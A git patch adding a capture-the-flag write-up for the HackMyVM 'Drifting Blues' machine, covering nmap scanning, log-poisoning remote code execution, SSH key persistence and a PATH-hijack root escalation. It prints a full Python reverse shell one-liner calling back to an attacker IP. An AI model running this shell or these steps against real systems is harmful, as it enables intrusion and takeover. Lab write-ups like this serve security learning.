From 84ef16914b3143a0805c438f980308b3404132fb Mon Sep 17 00:00:00 2001 From: AbdullahRizwan101 <60057481+AbdullahRizwan101@users.noreply.github.com> Date: Sat, 9 Jan 2021 03:41:47 +0500 Subject: [PATCH] Create Drifting_Blues.md --- HackMyVM/Drifting_Blues.md | 160 +++++++++++++++++++++++++++++++++++++ 1 file changed, 160 insertions(+) create mode 100644 HackMyVM/Drifting_Blues.md diff --git a/HackMyVM/Drifting_Blues.md b/HackMyVM/Drifting_Blues.md new file mode 100644 index 0000000..41ceae0 --- /dev/null +++ b/HackMyVM/Drifting_Blues.md @@ -0,0 +1,160 @@ +# HackMyVM-Drifiting Blues + +## Netdiscover + + + +## NMAP + +``` +Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-09 00:43 PKT +Nmap scan report for 192.168.1.9 +Host is up (0.00034s latency). +Not shown: 998 closed ports +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) +| ssh-hostkey: +| 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA) +| 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA) +|_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519) +80/tcp open http Apache httpd 2.4.38 ((Debian)) +| http-robots.txt: 1 disallowed entry +|_/eventadmins +|_http-server-header: Apache/2.4.38 (Debian) +|_http-title: Site doesn't have a title (text/html). +MAC Address: 08:00:27:EE:16:C7 (Oracle VirtualBox virtual NIC) +Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +Nmap done: 1 IP address (1 host up) scanned in 8.33 seconds + +``` + +We have 2 ports open http and ssh and we have robots.txt on the webserver + +## PORT 80 (HTTP) + + + + + +## Dirbuster + + + + + + +Running dirbuster we can see there is `robots.txt` , `secret` and `wp-admin` which tells that there is wordpress running on the machine and these directories are interesting to us. + +We visit `robots.txt` + + + +From there we can see it doesn't allow `/eventadmins` to be shown on webcrawlers + + + +So `john` and `buddyG` might be the two usernames also visiting `littlequeenofspades.html` + + + +We would find a base64 encoded text + + + +On further decoding the text + + + +We will get a page `adminsfixit.php` + + + +Here we can see ssh authorization log which logs about the users when anyone tries to login with a username and gives success or failed attempt message + + + + +As you can see when we interact with SSH it gets log I tried to login with `arz` and it got logged.Now let's try to add php `GET` paramter which will test if we can get Remote Code Execution or not + + + + + + +And it did worked + +***Note : My private IP was changed due to a change of network also if your doing something with special characters bash is the way to go , we need to be careful with special characters when using zsh shell. *** + + +Now I'll check for python if it is installed with `which python` + + + +Great now I'll setup the python reverse shell + +python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.43.129",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' + + + + +And we are in !!! + +Stabilize the shell with python + + + + + +This might work differently in zsh shell + + + + + +Now we find a user named `robertj` and we can write to the `.ssh` directory so generate a ssh key pair with `ssh-keygen` on your host machine and transfer it through wget or python server + + + + + + +As you can see we are hosting the public and private key so we need only public on the target machine and private with us to communicate with it.Copy the contents of `id_rsa.pub` move to target machine and rename it to `authorized_keys` in the `.ssh` folder. + + + + +## Privilege Escalation + +Now let's find if there are SUID binaries on the box + + + +Through this find command we found a binary named `getinfo` which is not normal to have SUID it belongs to user `root` and group `operator` looking our UID and GID we are in operators group so we can do something with it. + +On running the binary + + + + + +It basically is running the following commands in the binary + + + + + + + +So here what we can do is make a file with the name of `ip` put `/bin/bash` in it make it executable and change the PATH variable which is known as "Exploiting PATH variable" + + + + + +And now when we'll run the binary + + + +We will be root !!!